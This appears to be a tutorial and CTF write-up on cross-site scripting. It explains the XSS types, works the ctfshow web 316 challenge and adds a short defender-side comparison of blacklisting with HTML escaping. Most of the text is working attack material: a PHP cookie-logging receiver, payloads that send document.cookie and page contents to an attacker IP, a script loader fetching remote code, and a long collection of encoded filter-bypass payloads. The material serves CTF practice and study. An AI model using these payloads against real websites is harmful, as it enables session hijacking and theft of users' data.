At its core, XSS is an advanced form of phishing.
Understanding XSS
XSS (Cross Site Scripting) is the cross-site scripting attack; it is abbreviated XSS rather than CSS to avoid confusion with the abbreviation for Cascading Style Sheets (CSS).
XSS is a computer security vulnerability that frequently appears in web applications. It allows a malicious web user to plant code into pages that are served to other users.
An XSS attack generally involves three parties: the attacker, the target server, and the victim's browser.
Principle: a malicious script is inserted into an HTML/CSS/JS file.

Reflected XSS
Reflected XSS is also called non-persistent XSS.
It is called reflected because the injected code is "reflected" back from the target server through an error message, a search result or similar: when the request is sent, the XSS code is in the URL and is submitted to the server as input; the server parses it and responds, the XSS code comes back to the browser together with the response body, and the browser finally parses and executes it. The process resembles a reflection, hence the name.
It is called non-persistent because the attack is one-shot: the code is injected into a dynamically generated page rather than a permanent one, so it only takes effect when the link is clicked.
Characteristics:
① nothing is stored on the server; a single HTTP GET or POST request completes the attack and obtains the user's private data;
② the attacker has to trick the victim into clicking;
③ low feedback rate, so it is harder to discover and to respond to and fix;
④ steals the user's sensitive, confidential information.
Stored XSS
Stored XSS is also called persistent XSS.
The biggest difference from reflected XSS is that the attack script is stored permanently on the target server (database, memory, file system, etc.), so the XSS code does not have to be resubmitted the next time the target page is requested.
It usually lives in interactive features that submit form data, such as posting, leaving comments or submitting text, and is most common on forums. Exploiting the XSS vulnerability, the attacker submits the content through the normal feature so that it is persisted in the database; when the front-end page receives the injected code read back from the database by the back end, it renders and executes it.
Characteristics:
① persistent, planted in the database;
② wide impact; it can even turn user machines into DDoS bots;
③ steals the user's sensitive, private information.
DOM-based XSS
DOM-based XSS is a vulnerability based on the Document Object Model (DOM). DOM node tags such as img and input are what DOM-based XSS leverages to carry out the attack.
DOM-based XSS is triggered entirely on the front end.
Worked example: ctfshow web入门 316

Whatever is entered is echoed back, so try executing JS: <script>alert(1)</script>

The popup appears.
In this challenge the flag is in the administrator's cookie, and a bot periodically visits the generated link automatically.
Create a receiver script a.php on a VPS:
<?php
// Append whatever arrives in the cookie parameter to cookie.txt
$cookie = $_GET['cookie'];
$log = fopen("cookie.txt", "a");
fwrite($log, $cookie . "\n");
fclose($log);
?>
Generate the XSS link used to obtain the administrator's cookie:
<body/**/onload="window.open('http://ip:port/index.php/?1='+document.cookie)"></body>
<body/**/onload="window.location.href='http://ip:port/index.php/?1='+document.cookie"></body>
<script>window.open("http://149.88.83.236:8000/a.php/?1="+document.cookie)</script>
Listening with python3 -m http.server is enough to receive the cookie.

<script>window.open('http://149.88.83.236:8000/a.php'+document.getElementsByClassName('layui-table-cell laytable-cell-1-0-1')[1].innerHTML)</script>
Fragment | Meaning
window.open(url) | opens a URL in a new window (which also issues a GET request)
'http://149.88.83.236:8000/a.php' | the attacker's own server (used to collect the data)
document.getElementsByClassName(...)[1] | gets the second element on the page whose class is layui-table-cell laytable-cell-1-0-1
.innerHTML | extracts that element's HTML content, which may be the flag or other sensitive data
Concatenated into a full URL | the sensitive data is appended as a URL parameter and sent back to the attacker
<script>$('.layui-table-cell').each(function(index,value){{if(value.innerHTML.indexOf('ctfshow') > -1){window.open("http://149.88.83.236:8000/a.php/?1="+value.innerHTML);}}})</script>
- Iterates over every .layui-table-cell element
- Checks whether its innerHTML contains 'ctfshow' (the flag prefix)
- On a match, uses window.open() to open a new window that carries the flag content away
Bypass
The usual payload is <script>alert(1)</script>.
Alternatively the img, body and input tags can be used.
In an IMG tag, onload fires when the given image URL exists and the image finishes loading; onerror fires when the URL does not exist or a network error occurs.
- If () is filtered, // and `` can be used instead
- If spaces are filtered, /**/ gets around it
- If <> is filtered, %3c and %3e can be used instead
- If quotes are filtered, %27 or %22 can be used instead
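As an added, defender-side example (not part of the original write-up or of ctfshow): the kind of blacklist this bypass list is written against, checked against payloads drawn from this page, beside the context-aware output encoding that actually closes the reflected and stored cases above. The names naive_filter, still_executable and safe_render, the payload set and the detection regex are assumptions constructed for this example; the regex is a rough heuristic, not an HTML parser.

```python
import html
import re

# Payloads constructed from this page's own list: a plain script tag, the
# split-tag trick, the /**/ space bypass with the cookie exfil, and the
# backtick call that needs neither "()" nor a <script> tag.
PAYLOADS = [
    "<script>alert(1)</script>",
    "<scr<script>ipt>alert(1)</scr<script>ipt>",
    "<body/**/onload=\"window.open('http://ip:port/a.php/?1='+document.cookie)\"></body>",
    "<img/src=x/onerror=alert`1`>",
]


def naive_filter(s: str) -> str:
    """A blacklist of the kind the bypass list is written against:
    strip <script> tags and drop parentheses, spaces and quotes."""
    s = s.replace("<script>", "").replace("</script>", "")
    for ch in "() '\"":
        s = s.replace(ch, "")
    return s


# Rough heuristic, not a parser: a surviving <script> tag, a tag carrying an
# on* event handler, or a javascript: URL means the browser still has
# something to execute.
DANGEROUS = re.compile(r"<\s*script|<[^>]+\bon\w+\s*=|javascript:", re.I)


def still_executable(s: str) -> bool:
    return DANGEROUS.search(s) is not None


def safe_render(user_input: str) -> str:
    """The fix: encode for the HTML context at output time. quote=True also
    encodes ' and ", so the same helper is safe inside a quoted attribute."""
    return "<td>" + html.escape(user_input, quote=True) + "</td>"


def evaluate(payloads=PAYLOADS) -> dict:
    """Per payload: does each defence still let it through as executable?"""
    return {
        p: {
            "blacklist": still_executable(naive_filter(p)),
            "escaped": still_executable(safe_render(p)),
        }
        for p in payloads
    }


if __name__ == "__main__":
    for p, r in evaluate().items():
        print(f"{p[:44]:46} blacklist={r['blacklist']!s:5} escaped={r['escaped']}")
```

Only the plain script tag is stopped by the blacklist; the other three survive it unchanged in effect, while all four come out of safe_render as inert text. Marking the session cookie HttpOnly would additionally keep document.cookie from reading it even where a payload does run.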
Payload collection
# Class 1: JavaScript URL
<a href="javascript:alert('test')">link</a>
<a href="javascript:alert('xss')">link</a>
<a href='vbscript:MsgBox("XSS")'>link</a>
<a href="vbscript:alert(1)">Hello</a>
<a href=javascript:alert("XSS")>link</a>
<a href=`javascript:alert("RSnake says,'XSS'")`>link</a>
<a href=javascript:alert(String.fromCharCode(88,83,83))>link</a>
<a href="javascript:alert(1)">link</a>
<a href="javaSCRIPT:alert(1)">Hello</a>
<a href="javasc
ript:alert(1)">link</a>
<a href="javas	cript:\u0061lert(1);">Hello</a>
<a href="jav ascript:alert('XSS')">link</a>
<a href="jav	ascript:alert('XSS')">link</a>
<a href="jav
ascript:alert('XSS')">link</a>
<a href=" javascript:alert('XSS');">link</a>
<a href="javascript:\u0061lert(1)">Hello</a>
<a href="javascript:confirm`1`">link</a>
<a href="javascript:confirm(1)">link</a>
<a href="j	a	vas	c	r	ipt:alert(1)">1</a>
<a href="javascript:%61%6c%65%72%74%28%31%29">link</a>
<a href="javascript:\u0061\u006C\u0065\u0072\u0074(1)">link</a>
<a href=javascript:eval("\x61\x6c\x65\x72\x74\x28\x27\x78\x73\x73\x27\x29")>2</a>
<a href=javascript:eval("alert('xss')")>link</a>
<a href=javascript:alert('XSS')>link</a>
<a href="data:text/html;base64,amF2YXNjcmlwdDphbGVydCgxKQ==">test</a>
<a href=data:text/html;base64,PHNjcmlwdD5hbGVydChkb2N1bWVudC5kb21haW4pPC9zY3JpcHQ+>1</a>
<iframe/src="data:text/html;	base64
,PGJvZHkgb25sb2FkPWFsZXJ0KDEpPg==">
# Class 2: CSS import
<style>@import url("http://attacker.org/malicious.css");</style>
<style>@imp\ort url("http://attacker.org/malicious.css");</style>
<STYLE>@im\port'\ja\vasc\ript:alert("XSS")';</STYLE>
<STYLE>@import'http://jb51.net/xss.css';</STYLE>
# Class 3: Inline style
<div style="color: expression(alert('XSS'))">
<div style=color:expression\(alert(1))></div>
<div style="color: '<'; color: expression(alert('XSS'))">
<div style=X:expression(alert(/xss/))>
<div style="x:\65\78\70\72\65\73\73\69\6f\6e(alert(1))">
<div style="x:\000065\000078\000070\000072\000065\000073\000073\000069\00006f\00006e(alert(1))">
<div style="x:\65\78\70\72\65\73\73\69\6f\6e\028 alert \028 1 \029 \029">
<STYLE>li {list-style-image: url("javascript:alert('XSS')");}</STYLE><UL><LI>XSS
<DIV STYLE="background-image: url(javascript:alert('XSS'))">
<STYLE>.XSS{background-image:url("javascript:alert('XSS')");}</STYLE><A CLASS=XSS></A>
<div style="z:exp/*anything*/res/*here*/sion(alert(1))">
<div style=xss:expr/*XSS*/ession(alert('XSS'))>
</XSS/*-*/STYLE=xss:e/**/xpression(alert('XSS'))>
</XSS/*-*/STYLE=xss:e/**/xpression(window.location="http://www.baidu.com")>
<img STYLE="background-image:url(javascript:alert('XSS'))"> //ie6
<img STYLE="background-image:\75\72\6c\28\6a\61\76\61\73\63\72\69\70\74\3a\61\6c\65\72\74\28\27\58\53\53\27\29\29">
<A STYLE='no\xss:noxss("*//*");xss:ex/*XSS*//*/*/pression(alert("XSS"))'>
# Class 4: JavaScript events
<div onclick="alert('xss')">
<div onmouseenter="alert('xss')">
<div onclick ="alert('xss')">
<BODY ONLOAD=alert('XSS')>
<img src=1 onerror=alert(1)>
<img/src='1'/onerror=alert(0)>
<img src="1" onerror="alert(1)" />
<img src=1 alt=al lang=ert onerror=top[alt+lang](0)>
<img src="1" onerror=eval("\x61\x6c\x65\x72\x74\x28\x27\x78\x73\x73\x27\x29")></img>
<img src=1 onmouseover=alert('xss') a1=1111>
<img src=x onerror=s=createElement('script');body.appendChild(s);s.src='http://t.cn/R5UpyOt';>
<a href="#" onclick=alert('\170\163\163')>test</a>
<a href="#" onclick="\u0061\u006C\u0065\u0072\u0074(1)">link</a>
<a href="#" onclick="\u0061\u006C\u0065\u0072\u0074`a`">link</a>
<a href="#" onclick="alert('xss')">link</a>
<marquee onscroll=alert(1)> test</marquee>
<div style="width:100px;height:100px;overflow:scroll" onscroll="alert('a')">123456 <br/><br/><br/><br/><br/></div>
<DIV onmousewheel="alert('a')" >123456</DIV><br/><br/><br/><br/><br/><br/><br/><br/><br/><br/><br/>
<div style="background-color:red" onmouseenter="alert('a')">123456</div>
<DIV onmouseleave="alert('1')">123456</DIV>
<div contentEditable="true" style="background-color:red" onfocusin="alert('a')" >asdf</div>
<div contentEditable="true" style="background-color:red" onfocusout="alert('bem')" >asdf</div>
<marquee onstart="alert('a')" >asdf</marquee>
<div style="background-color:red;" onbeforecopy="alert('a')" >asdf</div>
<div style="background-color:red;" onbeforecut="alert('a')" >asdf</div>
<div style="background-color:red;" contentEditable="true" onbeforeeditfocus="alert('a')" >asdf</div>
<div style="background-color:red;" contentEditable="true" onbeforepaste="alert('a')" >asdf</div>
<div style="background-color:red;" oncontextmenu="alert('a')" >asdf</div>
<div style="background-color:red;" oncopy="alert('a')" >asdf</div>
<div contentEditable="true" style="background-color:red;" oncut="alert('a')" >asdf</div>
<div style="background-color:red;" ondrag="alert('1')" >asdf</div>
<div style="background-color:red;" ondragend="alert('a')" >asdf</div>
<div style="background-color:red;" ondragenter="alert('b')" >asdf</div>
<div contentEditable="true" style="background-color:red;" ondragleave="alert('a')" >asdf</div>
<div contentEditable="true" style="background-color:red;" ondragover="alert('b')" >asdf</div>
<div contentEditable="true" style="background-color:red;" ondragstart="alert('a')" >asdf</div>
<div contentEditable="true" style="background-color:red;" ondrop="alert('b')" >asdf</div>
<div contentEditable="true" style="background-color:green;" ondrop="alert('bem')" >asdf</div>
<div contentEditable="true" style="background-color:red;" onlosecapture="alert('b')">asdf</div>
<div contentEditable="true" style="background-color:red;" onpaste="alert('a')" >asdf</div>
<div contentEditable="true" style="background-color:red;" onselectstart="alert('a')" >asdf</div>
<div contentEditable="true" style="background-color:red;" onhelp="alert('a')" >asdf</div>
<div STYLE="background-color:red;behavior:url('#default#time2')" onEnd="alert('a')">asdf</div>
<div STYLE="background-color:red;behavior:url('#default#time2')" onBegin="alert('a')">asdf</div>
<div contentEditable="true" STYLE="background-color:red;" onactivate="alert('b')">asdf</div>
<div contentEditable="true" STYLE="background-color:red;filter: Alpha(opacity=100, style=2);"onfilterchange="alert('b')">asdf</div>
<div contentEditable="true" onbeforeactivate="alert('b')">asdf</div>
<div contentEditable="true" onbeforedeactivate="alert('a')">asdf</div>
<div contentEditable="true" ondeactivate="alert('bem')">asdf</div>
<video src="http://www.w3schools.com/html5/movie.ogg" onloadedmetadata="alert(1)" />
<video src="http://www.w3schools.com/html5/movie.ogg" onloadstart="alert(1)" />
<audio src="http://www.w3schools.com/html5/movie.ogg" onloadstart="alert(1)">
<audio src="http://www.w3schools.com/html5/movie.ogg" onloadstart="alert(1)"></audio>
<body onscroll=alert(26)><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br>
<input type="hidden" accesskey="X" onclick="alert(/xss/)">
# Class 5: Script tag
<script src="http://baidu.com"></script><script>Function(atob('YWxlcnQoInhzcyIp'))()</script>
<script>alert("XSS")</script>
<scr<script>ipt>alert("XSS")</scr<script>ipt>
<SCRIPT>a=/XSS/ alert(a.source)</SCRIPT>
<script>alert(/1/.source)</script>
<script>alert(1);</script>
<script>prompt(1);</script>
<script>confirm(1);</script>
<script>alert(/88199/)</script>
<script>alert(`a`)</script>
<script>alert('a')</script>
<SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>
<script>eval(alert(1))</script>
<script>eval(String.fromCharCode(97, 108, 101, 114, 116, 40, 49, 50, 51, 41))</script>
<script>eval("\u0061\u006c\u0065\u0072\u0074\u0028\u0022\u0078\u0073\u0073\u0022\u0029")</script>
<script>eval('\x61\x6c\x65\x72\x74\x28\x27\x78\x73\x73\x27\x29')</script>
<script>setTimeout('\x61\x6c\x65\x72\x74\x28\x27\x78\x73\x73\x27\x29')</script>
<script>setTimeout(alert(1),0)</script>
<script>setTimeout`alert\x28\x27 xss \x27\x29`</script>
<script>setInterval('\x61\x6c\x65\x72\x74\x28\x27\x78\x73\x73\x27\x29')</script>
<script src=data:text/javascript,alert(1)></script>
<script>\u0061\u006C\u0065\u0072\u0074(123)</script>
<script>\u0061\u006C\u0065\u0072\u0074(1)</script>
<script>\u0061\u006C\u0065\u0072\u0074`a`</script>
<script>window['alert'](0)</script>
<script>parent['alert'](1)</script>
<script>self['alert'](2)</script>
<script>top['alert'](3)</script>
1. onmouseenter: runs code when the mouse enters the element
<div style="background-color:red" onmouseenter="alert('bem')" >123456</div>
2. onmouseleave: runs code when the mouse leaves the element
<DIV onmouseleave="alert('bem')" style="background-color:red">123456</DIV>
3. onmousewheel: runs code when the mouse wheel is scrolled over the element
<DIV onmousewheel="alert('bem')" style="background-color:red">123456</DIV>
4. onscroll: runs code when the scrollbar is dragged
<div style="width:100px;height:100px;overflow:scroll" onscroll="alert('bem')">123456 </div>
5. onfocusin: runs code when the element gains focus
<div contentEditable="true" style="background-color:red" onfocusin="alert('bem')" >asdf</div>
6. onfocusout: runs code when the element loses focus
<div contentEditable="true" style="background-color:red" onfocusout="alert('bem')" >asdf</div>
7. onstart: runs code when the content is displayed
<marquee style="background-color:red" onstart="alert('bem')" >asdf</marquee>
8. onbeforecopy: runs code on right-click after content is selected
<div style="" onbeforecopy="alert('bem')" >asdf</div>
9. onbeforecut: runs code on right-click after content is selected
<div style="" onbeforecut="alert('bem')" >asdf</div>
10. onbeforeeditfocus: runs code when the element gains focus
<div style="" contentEditable="true" onbeforeeditfocus="alert('bem')" >asdf</div>
11. onbeforepaste: runs code on right-click after content is selected
<div style="" contentEditable="true" onbeforepaste="alert('bem')" >asdf</div>
12. oncontextmenu: runs code on right-click
<div style="" oncontextmenu="alert('bem')" >asdf</div>
13. oncopy: runs code when copying from the right-click menu
<div style="" oncopy="alert('bem')" >asdf</div>
14. oncut: runs code when cutting from the right-click menu
<div contentEditable="true" style="" oncut="alert('bem')" >asdf</div>
15. ondrag: runs code while selected content is being dragged
<div style="" ondrag="alert('bem')" >asdf</div>
16. ondragend: runs code when the mouse is released after dragging selected content
<div style="" ondragend="alert('bem')" >asdf</div>
17. ondragenter: runs code while selected content is being dragged
<div style="" ondragenter="alert('bem')" >asdf</div>
18. ondragleave: runs code when selected content is dragged out of the border
<div contentEditable="true" style="" ondragleave="alert('bem')" >asdf</div>
19. ondragover: runs code while selected content is being dragged
<div contentEditable="true" style="" ondragover="alert('bem')" >asdf</div>
20. ondragstart: runs code when dragging of selected content starts
<div contentEditable="true" style="" ondragstart="alert('bem')" >asdf</div>
21. ondrop: runs code when content is dropped into the element
<div contentEditable="true" style="" ondrop="alert('bem')" >asdf</div>
22. onlosecapture: runs code when content is selected
<div contentEditable="true" style="" onlosecapture="alert('bem')" >asdf</div>
23. onpaste: runs code on paste
<div contentEditable="true" style="" onpaste="alert('bem')" >asdf</div>
24. onselectstart: runs code when content is selected
<div contentEditable="true" style="" onselectstart="alert('bem')" >asdf</div>
25. onhelp: runs code when F1 is pressed while the element has focus
<div contentEditable="true" style="" onhelp="alert('bem')" >asdf</div>
26. onEnd: runs code when the timeline finishes
<div STYLE="behavior:url('#default#time2')" onEnd="alert('bem')">asdf</div>
27. onBegin: runs code when the timeline starts
<div STYLE="behavior:url('#default#time2')" onBegin="alert('bem')">asdf</div>
28. onactivate: runs code when the tag is activated
<div contentEditable="true" STYLE="" onactivate="alert('bem')">asdf</div>
29. onfilterchange: runs code when the filter changes
<div contentEditable="true" STYLE="filter: Alpha(opacity=100, style=2);" onfilterchange="alert('bem')">asdf</div>
30. onbeforeactivate: runs code when the tag is about to be activated
<div contentEditable="true" STYLE="" onbeforeactivate="alert('bem')">asdf</div>
31. onbeforedeactivate: runs code when the value inside the tag changes
<div contentEditable="true" STYLE="" onbeforedeactivate="alert('bem')">asdf</div>
32. ondeactivate: runs code when the value inside the tag changes
<div contentEditable="true" STYLE="" ondeactivate="alert('bem')">asdf</div>
<a> tag
<a href=javascript:alert(1)>111</a>
<img> tag
<img src=https://www.baidu.com/img/flexible/logo/pc/result.png>
<img src=x onerror=alert('XSS')//
<img src=x onerror=alert(String.fromCharCode(88,83,83));>
<img src=x oneonerrorrror=alert(String.fromCharCode(88,83,83));>
<img src=x:alert(alt) onerror=eval(src) alt=xss>
<input> tag
<input onmouseover=alert(1) />
<script> tag
<script>alert('XSS')</script>
<scr<script>ipt>alert('XSS')</scr<script>ipt>
"><script>alert('XSS')</script>
If alert is filtered, prompt, confirm or console.log can be used instead; if all of those are filtered too, switch to another way around it:
onmouseover=top[11189117..toString(32)](2222)
onmouseover="setTimeout(String.fromCharCode(97,108,101,114,116,40,49,41))"
onmousemove=top[11189117..toString(32)](2222)
onclick=... and so on
onmousemove='alert(1111)'a="
<script>top[11189117..toString(32)](2222)</script>
<ScRiPt>top[11189117..toString(32)](2222)</ScRiPt>
%3cscript%3ealert(1111)%3c/script%3e
<Script>\u0061\u006C\u0065\u0072\u0074(1111)</Script>
<img src=java\0script:alert`1111`>
<img src=x onerror=alert`1111`>
%3Cimg+src%3Dx+onerror%3Dtop[11189117..toString(32)]%601111%60%3E
References:
从0到1完全掌握 XSS (Mastering XSS from 0 to 1)
web攻防之XSS攻击详解——XSS简介与类型 (Web attack and defence: XSS explained, introduction and types)
XSS payload 大全 - Bypass - 博客园 (XSS payload compendium, Bypass, Cnblogs)